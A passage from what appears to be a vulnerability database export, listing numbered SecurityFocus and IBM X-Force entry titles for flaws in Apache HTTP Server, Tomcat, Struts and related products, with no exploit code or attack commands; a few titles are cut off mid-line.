14790| [8883] Apache Cocoon Directory Traversal Vulnerability
14791| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
14792| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
14793| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
14794| [8707] Apache htpasswd Password Entropy Weakness
14795| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
14796| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14797| [8226] Apache HTTP Server Multiple Vulnerabilities
14798| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
14799| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
14800| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
14801| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
14802| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
14803| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
14804| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
14805| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
14806| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
14807| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
14808| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
14809| [7255] Apache Web Server File Descriptor Leakage Vulnerability
14810| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
14811| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
14812| [6939] Apache Web Server ETag Header Information Disclosure Weakness
14813| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
14814| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
14815| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
14816| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
14817| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
14818| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
14819| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
14820| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
14821| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
14822| [6117] Apache mod_php File Descriptor Leakage Vulnerability
14823| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
14824| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
14825| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
14826| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
14827| [5992] Apache HTDigest Insecure Temporary File Vulnerability
14828| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
14829| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
14830| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
14831| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
14832| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
14833| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14834| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
14835| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
14836| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
14837| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
14838| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14839| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
14840| [5485] Apache 2.0 Path Disclosure Vulnerability
14841| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14842| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
14843| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
14844| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
14845| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
14846| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
14847| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
14848| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
14849| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
14850| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
14851| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
14852| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
14853| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
14854| [4437] Apache Error Message Cross-Site Scripting Vulnerability
14855| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
14856| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
14857| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
14858| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
14859| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
14860| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
14861| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
14862| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
14863| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
14864| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
14865| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
14866| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
14867| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
14868| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
14869| [3596] Apache Split-Logfile File Append Vulnerability
14870| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
14871| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
14872| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
14873| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
14874| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
14875| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
14876| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
14877| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
14878| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
14879| [3169] Apache Server Address Disclosure Vulnerability
14880| [3009] Apache Possible Directory Index Disclosure Vulnerability
14881| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
14882| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
14883| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
14884| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
14885| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
14886| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
14887| [2216] Apache Web Server DoS Vulnerability
14888| [2182] Apache /tmp File Race Vulnerability
14889| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
14890| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
14891| [1821] Apache mod_cookies Buffer Overflow Vulnerability
14892| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14893| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14894| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14895| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14896| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14897| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14898| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14899| [1457] Apache::ASP source.asp Example Script Vulnerability
14900| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14901| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14902|
14903| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14904| [86258] Apache CloudStack text fields cross-site scripting
14905| [85983] Apache Subversion mod_dav_svn module denial of service
14906| [85875] Apache OFBiz UEL code execution
14907| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14908| [85871] Apache HTTP Server mod_session_dbd unspecified
14909| [85756] Apache Struts OGNL expression command execution
14910| [85755] Apache Struts DefaultActionMapper class open redirect
14911| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14912| [85574] Apache HTTP Server mod_dav denial of service
14913| [85573] Apache Struts Showcase App OGNL code execution
14914| [85496] Apache CXF denial of service
14915| [85423] Apache Geronimo RMI classloader code execution
14916| [85326] Apache Santuario XML Security for C++ buffer overflow
14917| [85323] Apache Santuario XML Security for Java spoofing
14918| [85319] Apache Qpid Python client SSL spoofing
14919| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
14920| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
14921| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
14922| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
14923| [84952] Apache Tomcat CVE-2012-3544 denial of service
14924| [84763] Apache Struts CVE-2013-2135 security bypass
14925| [84762] Apache Struts CVE-2013-2134 security bypass
14926| [84719] Apache Subversion CVE-2013-2088 command execution
14927| [84718] Apache Subversion CVE-2013-2112 denial of service
14928| [84717] Apache Subversion CVE-2013-1968 denial of service
14929| [84577] Apache Tomcat security bypass
14930| [84576] Apache Tomcat symlink
14931| [84543] Apache Struts CVE-2013-2115 security bypass
14932| [84542] Apache Struts CVE-2013-1966 security bypass
14933| [84154] Apache Tomcat session hijacking
14934| [84144] Apache Tomcat denial of service
14935| [84143] Apache Tomcat information disclosure
14936| [84111] Apache HTTP Server command execution
14937| [84043] Apache Virtual Computing Lab cross-site scripting
14938| [84042] Apache Virtual Computing Lab cross-site scripting
14939| [83782] Apache CloudStack information disclosure
14940| [83781] Apache CloudStack security bypass
14941| [83720] Apache ActiveMQ cross-site scripting
14942| [83719] Apache ActiveMQ denial of service
14943| [83718] Apache ActiveMQ denial of service
14944| [83263] Apache Subversion denial of service
14945| [83262] Apache Subversion denial of service
14946| [83261] Apache Subversion denial of service
14947| [83259] Apache Subversion denial of service
14948| [83035] Apache mod_ruid2 security bypass
14949| [82852] Apache Qpid federation_tag security bypass
14950| [82851] Apache Qpid qpid::framing::Buffer denial of service
14951| [82758] Apache Rave User RPC API information disclosure
14952| [82663] Apache Subversion svn_fs_file_length() denial of service
14953| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
14954| [82641] Apache Qpid AMQP denial of service
14955| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
14956| [82618] Apache Commons FileUpload symlink
14957| [82360] Apache HTTP Server manager interface cross-site scripting
14958| [82359] Apache HTTP Server hostnames cross-site scripting
14959| [82338] Apache Tomcat log/logdir information disclosure
14960| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
14961| [82268] Apache OpenJPA deserialization command execution
14962| [81981] Apache CXF UsernameTokens security bypass
14963| [81980] Apache CXF WS-Security security bypass
14964| [81398] Apache OFBiz cross-site scripting
14965| [81240] Apache CouchDB directory traversal
14966| [81226] Apache CouchDB JSONP code execution
14967| [81225] Apache CouchDB Futon user interface cross-site scripting
14968| [81211] Apache Axis2/C SSL spoofing
14969| [81167] Apache CloudStack DeployVM information disclosure
14970| [81166] Apache CloudStack AddHost API information disclosure
14971| [81165] Apache CloudStack createSSHKeyPair API information disclosure
14972| [80518] Apache Tomcat cross-site request forgery security bypass
14973| [80517] Apache Tomcat FormAuthenticator security bypass
14974| [80516] Apache Tomcat NIO denial of service
14975| [80408] Apache Tomcat replay-countermeasure security bypass
14976| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
14977| [80317] Apache Tomcat slowloris denial of service
14978| [79984] Apache Commons HttpClient SSL spoofing
14979| [79983] Apache CXF SSL spoofing
14980| [79830] Apache Axis2/Java SSL spoofing
14981| [79829] Apache Axis SSL spoofing
14982| [79809] Apache Tomcat DIGEST security bypass
14983| [79806] Apache Tomcat parseHeaders() denial of service
14984| [79540] Apache OFBiz unspecified
14985| [79487] Apache Axis2 SAML security bypass
14986| [79212] Apache Cloudstack code execution
14987| [78734] Apache CXF SOAP Action security bypass
14988| [78730] Apache Qpid broker denial of service
14989| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
14990| [78563] Apache mod_pagespeed module unspecified cross-site scripting
14991| [78562] Apache mod_pagespeed module security bypass
14992| [78454] Apache Axis2 security bypass
14993| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
14994| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
14995| [78321] Apache Wicket unspecified cross-site scripting
14996| [78183] Apache Struts parameters denial of service
14997| [78182] Apache Struts cross-site request forgery
14998| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
14999| [77987] mod_rpaf module for Apache denial of service
15000| [77958] Apache Struts skill name code execution
15001| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
15002| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
15003| [77568] Apache Qpid broker security bypass
15004| [77421] Apache Libcloud spoofing
15005| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
15006| [77046] Oracle Solaris Apache HTTP Server information disclosure
15007| [76837] Apache Hadoop information disclosure
15008| [76802] Apache Sling CopyFrom denial of service
15009| [76692] Apache Hadoop symlink
15010| [76535] Apache Roller console cross-site request forgery
15011| [76534] Apache Roller weblog cross-site scripting
15012| [76152] Apache CXF elements security bypass
15013| [76151] Apache CXF child policies security bypass
15014| [75983] MapServer for Windows Apache file include
15015| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
15016| [75558] Apache POI denial of service
15017| [75545] PHP apache_request_headers() buffer overflow
15018| [75302] Apache Qpid SASL security bypass
15019| [75211] Debian GNU/Linux apache 2 cross-site scripting
15020| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
15021| [74871] Apache OFBiz FlexibleStringExpander code execution
15022| [74870] Apache OFBiz multiple cross-site scripting
15023| [74750] Apache Hadoop unspecified spoofing
15024| [74319] Apache Struts XSLTResult.java file upload
15025| [74313] Apache Traffic Server header buffer overflow
15026| [74276] Apache Wicket directory traversal
15027| [74273] Apache Wicket unspecified cross-site scripting
15028| [74181] Apache HTTP Server mod_fcgid module denial of service
15029| [73690] Apache Struts OGNL code execution
15030| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
15031| [73100] Apache MyFaces in directory traversal
15032| [73096] Apache APR hash denial of service
15033| [73052] Apache Struts name cross-site scripting
15034| [73030] Apache CXF UsernameToken security bypass
15035| [72888] Apache Struts lastName cross-site scripting
15036| [72758] Apache HTTP Server httpOnly information disclosure
15037| [72757] Apache HTTP Server MPM denial of service
15038| [72585] Apache Struts ParameterInterceptor security bypass
15039| [72438] Apache Tomcat Digest security bypass
15040| [72437] Apache Tomcat Digest security bypass
15041| [72436] Apache Tomcat DIGEST security bypass
15042| [72425] Apache Tomcat parameter denial of service
15043| [72422] Apache Tomcat request object information disclosure
15044| [72377] Apache HTTP Server scoreboard security bypass
15045| [72345] Apache HTTP Server HTTP request denial of service
15046| [72229] Apache Struts ExceptionDelegator command execution
15047| [72089] Apache Struts ParameterInterceptor directory traversal
15048| [72088] Apache Struts CookieInterceptor command execution
15049| [72047] Apache Geronimo hash denial of service
15050| [72016] Apache Tomcat hash denial of service
15051| [71711] Apache Struts OGNL expression code execution
15052| [71654] Apache Struts interfaces security bypass
15053| [71620] Apache ActiveMQ failover denial of service
15054| [71617] Apache HTTP Server mod_proxy module information disclosure
15055| [71508] Apache MyFaces EL security bypass
15056| [71445] Apache HTTP Server mod_proxy security bypass
15057| [71203] Apache Tomcat servlets privilege escalation
15058| [71181] Apache HTTP Server ap_pregsub() denial of service
15059| [71093] Apache HTTP Server ap_pregsub() buffer overflow
15060| [70336] Apache HTTP Server mod_proxy information disclosure
15061| [69804] Apache HTTP Server mod_proxy_ajp denial of service
15062| [69472] Apache Tomcat AJP security bypass
15063| [69396] Apache HTTP Server ByteRange filter denial of service
15064| [69394] Apache Wicket multi window support cross-site scripting
15065| [69176] Apache Tomcat XML information disclosure
15066| [69161] Apache Tomcat jsvc information disclosure
15067| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
15068| [68541] Apache Tomcat sendfile information disclosure
15069| [68420] Apache XML Security denial of service
15070| [68238] Apache Tomcat JMX information disclosure
15071| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
15072| [67804] Apache Subversion control rules information disclosure
15073| [67803] Apache Subversion control rules denial of service
15074| [67802] Apache Subversion baselined denial of service
15075| [67672] Apache Archiva multiple cross-site scripting
15076| [67671] Apache Archiva multiple cross-site request forgery
15077| [67564] Apache APR apr_fnmatch() denial of service
15078| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
15079| [67515] Apache Tomcat annotations security bypass
15080| [67480] Apache Struts s:submit information disclosure
15081| [67414] Apache APR apr_fnmatch() denial of service
15082| [67356] Apache Struts javatemplates cross-site scripting
15083| [67354] Apache Struts Xwork cross-site scripting
15084| [66676] Apache Tomcat HTTP BIO information disclosure
15085| [66675] Apache Tomcat web.xml security bypass
15086| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
15087| [66241] Apache HttpComponents information disclosure
15088| [66154] Apache Tomcat ServletSecurity security bypass
15089| [65971] Apache Tomcat ServletSecurity security bypass
15090| [65876] Apache Subversion mod_dav_svn denial of service
15091| [65343] Apache Continuum unspecified cross-site scripting
15092| [65162] Apache Tomcat NIO connector denial of service
15093| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
15094| [65160] Apache Tomcat HTML Manager interface cross-site scripting
15095| [65159] Apache Tomcat ServletContect security bypass
15096| [65050] Apache CouchDB web-based administration UI cross-site scripting
15097| [64773] Oracle HTTP Server Apache Plugin unauthorized access
15098| [64473] Apache Subversion blame -g denial of service
15099| [64472] Apache Subversion walk() denial of service
15100| [64407] Apache Axis2 CVE-2010-0219 code execution
15101| [63926] Apache Archiva password privilege escalation
15102| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
15103| [63493] Apache Archiva credentials cross-site request forgery
15104| [63477] Apache Tomcat HttpOnly session hijacking
15105| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
15106| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
15107| [62959] Apache Shiro filters security bypass
15108| [62790] Apache Perl cgi module denial of service
15109| [62576] Apache Qpid exchange denial of service
15110| [62575] Apache Qpid AMQP denial of service
15111| [62354] Apache Qpid SSL denial of service
15112| [62235] Apache APR-util apr_brigade_split_line() denial of service
15113| [62181] Apache XML-RPC SAX Parser information disclosure
15114| [61721] Apache Traffic Server cache poisoning
15115| [61202] Apache Derby BUILTIN authentication functionality information disclosure
15116| [61186] Apache CouchDB Futon cross-site request forgery
15117| [61169] Apache CXF DTD denial of service
15118| [61070] Apache Jackrabbit search.jsp SQL injection
15119| [61006] Apache SLMS Quoting cross-site request forgery
15120| [60962] Apache Tomcat time cross-site scripting
15121| [60883] Apache mod_proxy_http information disclosure
15122| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
15123| [60264] Apache Tomcat Transfer-Encoding denial of service
15124| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
15125| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
15126| [59413] Apache mod_proxy_http timeout information disclosure
15127| [59058] Apache MyFaces unencrypted view state cross-site scripting
15128| [58827] Apache Axis2 xsd file include
15129| [58790] Apache Axis2 modules cross-site scripting
15130| [58299] Apache ActiveMQ queueBrowse cross-site scripting
15131| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
15132| [58056] Apache ActiveMQ .jsp source code disclosure
15133| [58055] Apache Tomcat realm name information disclosure
15134| [58046] Apache HTTP Server mod_auth_shadow security bypass
15135| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
15136| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
15137| [57429] Apache CouchDB algorithms information disclosure
15138| [57398] Apache ActiveMQ Web console cross-site request forgery
15139| [57397] Apache ActiveMQ createDestination.action cross-site scripting
15140| [56653] Apache HTTP Server DNS spoofing
15141| [56652] Apache HTTP Server DNS cross-site scripting
15142| [56625] Apache HTTP Server request header information disclosure
15143| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
15144| [56623] Apache HTTP Server mod_proxy_ajp denial of service
15145| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
15146| [55857] Apache Tomcat WAR files directory traversal
15147| [55856] Apache Tomcat autoDeploy attribute security bypass
15148| [55855] Apache Tomcat WAR directory traversal
15149| [55210] Intuit component for Joomla! Apache information disclosure
15150| [54533] Apache Tomcat 404 error page cross-site scripting
15151| [54182] Apache Tomcat admin default password
15152| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
15153| [53666] Apache HTTP Server Solaris pollset support denial of service
15154| [53650] Apache HTTP Server HTTP basic-auth module security bypass
15155| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
15156| [53041] mod_proxy_ftp module for Apache denial of service
15157| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
15158| [51953] Apache Tomcat Path Disclosure
15159| [51952] Apache Tomcat Path Traversal
15160| [51951] Apache stronghold-status Information Disclosure
15161| [51950] Apache stronghold-info Information Disclosure
15162| [51949] Apache PHP Source Code Disclosure
15163| [51948] Apache Multiviews Attack
15164| [51946] Apache JServ Environment Status Information Disclosure
15165| [51945] Apache error_log Information Disclosure
15166| [51944] Apache Default Installation Page Pattern Found
15167| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
15168| [51942] Apache AXIS XML External Entity File Retrieval
15169| [51941] Apache AXIS Sample Servlet Information Leak
15170| [51940] Apache access_log Information Disclosure
15171| [51626] Apache mod_deflate denial of service
15172| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
15173| [51365] Apache Tomcat RequestDispatcher security bypass
15174| [51273] Apache HTTP Server Incomplete Request denial of service
15175| [51195] Apache Tomcat XML information disclosure
15176| [50994] Apache APR-util xml/apr_xml.c denial of service
15177| [50993] Apache APR-util apr_brigade_vprintf denial of service
15178| [50964] Apache APR-util apr_strmatch_precompile() denial of service
15179| [50930] Apache Tomcat j_security_check information disclosure
15180| [50928] Apache Tomcat AJP denial of service
15181| [50884] Apache HTTP Server XML ENTITY denial of service
15182| [50808] Apache HTTP Server AllowOverride privilege escalation
15183| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
15184| [50059] Apache mod_proxy_ajp information disclosure
15185| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
15186| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
15187| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
15188| [49921] Apache ActiveMQ Web interface cross-site scripting
15189| [49898] Apache Geronimo Services/Repository directory traversal
15190| [49725] Apache Tomcat mod_jk module information disclosure
15191| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
15192| [49712] Apache Struts unspecified cross-site scripting
15193| [49213] Apache Tomcat cal2.jsp cross-site scripting
15194| [48934] Apache Tomcat POST doRead method information disclosure
15195| [48211] Apache Tomcat header HTTP request smuggling
15196| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
15197| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
15198| [47709] Apache Roller "
15199| [47104] Novell Netware ApacheAdmin console security bypass
15200| [47086] Apache HTTP Server OS fingerprinting unspecified
15201| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
15202| [45791] Apache Tomcat RemoteFilterValve security bypass
15203| [44435] Oracle WebLogic Apache Connector buffer overflow
15204| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15205| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15206| [44156] Apache Tomcat RequestDispatcher directory traversal
15207| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15208| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15209| [42987] Apache HTTP Server mod_proxy module denial of service
15210| [42915] Apache Tomcat JSP files path disclosure
15211| [42914] Apache Tomcat MS-DOS path disclosure
15212| [42892] Apache Tomcat unspecified unauthorized access
15213| [42816] Apache Tomcat Host Manager cross-site scripting
15214| [42303] Apache 403 error cross-site scripting
15215| [41618] Apache-SSL ExpandCert() authentication bypass
15216| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15217| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15218| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15219| [40562] Apache Geronimo init information disclosure
15220| [40478] Novell Web Manager webadmin-apache.conf security bypass
15221| [40411] Apache Tomcat exception handling information disclosure
15222| [40409] Apache Tomcat native (APR based) connector weak security
15223| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15224| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15225| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15226| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15227| [39804] Apache Tomcat SingleSignOn information disclosure
15228| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15229| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15230| [39608] Apache HTTP Server balancer manager cross-site request forgery
15231| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15232| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15233| [39472] Apache HTTP Server mod_status cross-site scripting
15234| [39201] Apache Tomcat JULI logging weak security
15235| [39158] Apache HTTP Server Windows SMB shares information disclosure
15236| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15237| [38951] Apache::AuthCAS Perl module cookie SQL injection
15238| [38800] Apache HTTP Server 413 error page cross-site scripting
15239| [38211] Apache Geronimo SQLLoginModule authentication bypass
15240| [37243] Apache Tomcat WebDAV directory traversal
15241| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15242| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15243| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15244| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15245| [36782] Apache Geronimo MEJB unauthorized access
15246| [36586] Apache HTTP Server UTF-7 cross-site scripting
15247| [36468] Apache Geronimo LoginModule security bypass
15248| [36467] Apache Tomcat functions.jsp cross-site scripting
15249| [36402] Apache Tomcat calendar cross-site request forgery
15250| [36354] Apache HTTP Server mod_proxy module denial of service
15251| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15252| [36336] Apache Derby lock table privilege escalation
15253| [36335] Apache Derby schema privilege escalation
15254| [36006] Apache Tomcat "
15255| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15256| [35999] Apache Tomcat \"
15257| [35795] Apache Tomcat CookieExample cross-site scripting
15258| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15259| [35384] Apache HTTP Server mod_cache module denial of service
15260| [35097] Apache HTTP Server mod_status module cross-site scripting
15261| [35095] Apache HTTP Server Prefork MPM module denial of service
15262| [34984] Apache HTTP Server recall_headers information disclosure
15263| [34966] Apache HTTP Server MPM content spoofing
15264| [34965] Apache HTTP Server MPM information disclosure
15265| [34963] Apache HTTP Server MPM multiple denial of service
15266| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15267| [34869] Apache Tomcat JSP example Web application cross-site scripting
15268| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15269| [34496] Apache Tomcat JK Connector security bypass
15270| [34377] Apache Tomcat hello.jsp cross-site scripting
15271| [34212] Apache Tomcat SSL configuration security bypass
15272| [34210] Apache Tomcat Accept-Language cross-site scripting
15273| [34209] Apache Tomcat calendar application cross-site scripting
15274| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15275| [34167] Apache Axis WSDL file path disclosure
15276| [34068] Apache Tomcat AJP connector information disclosure
15277| [33584] Apache HTTP Server suEXEC privilege escalation
15278| [32988] Apache Tomcat proxy module directory traversal
15279| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15280| [32708] Debian Apache tty privilege escalation
15281| [32441] ApacheStats extract() PHP call unspecified
15282| [32128] Apache Tomcat default account
15283| [31680] Apache Tomcat RequestParamExample cross-site scripting
15284| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15285| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15286| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15287| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15288| [29550] Apache mod_tcl set_var() format string
15289| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15290| [28357] Apache HTTP Server mod_alias script source information disclosure
15291| [28063] Apache mod_rewrite off-by-one buffer overflow
15292| [27902] Apache Tomcat URL information disclosure
15293| [26786] Apache James SMTP server denial of service
15294| [25680] libapache2 /tmp/svn file upload
15295| [25614] Apache Struts lookupMap cross-site scripting
15296| [25613] Apache Struts ActionForm denial of service
15297| [25612] Apache Struts isCancelled() security bypass
15298| [24965] Apache mod_python FileSession command execution
15299| [24716] Apache James spooler memory leak denial of service
15300| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15301| [24158] Apache Geronimo jsp-examples cross-site scripting
15302| [24030] Apache auth_ldap module multiple format strings
15303| [24008] Apache mod_ssl custom error message denial of service
15304| [24003] Apache mod_auth_pgsql module multiple syslog format strings
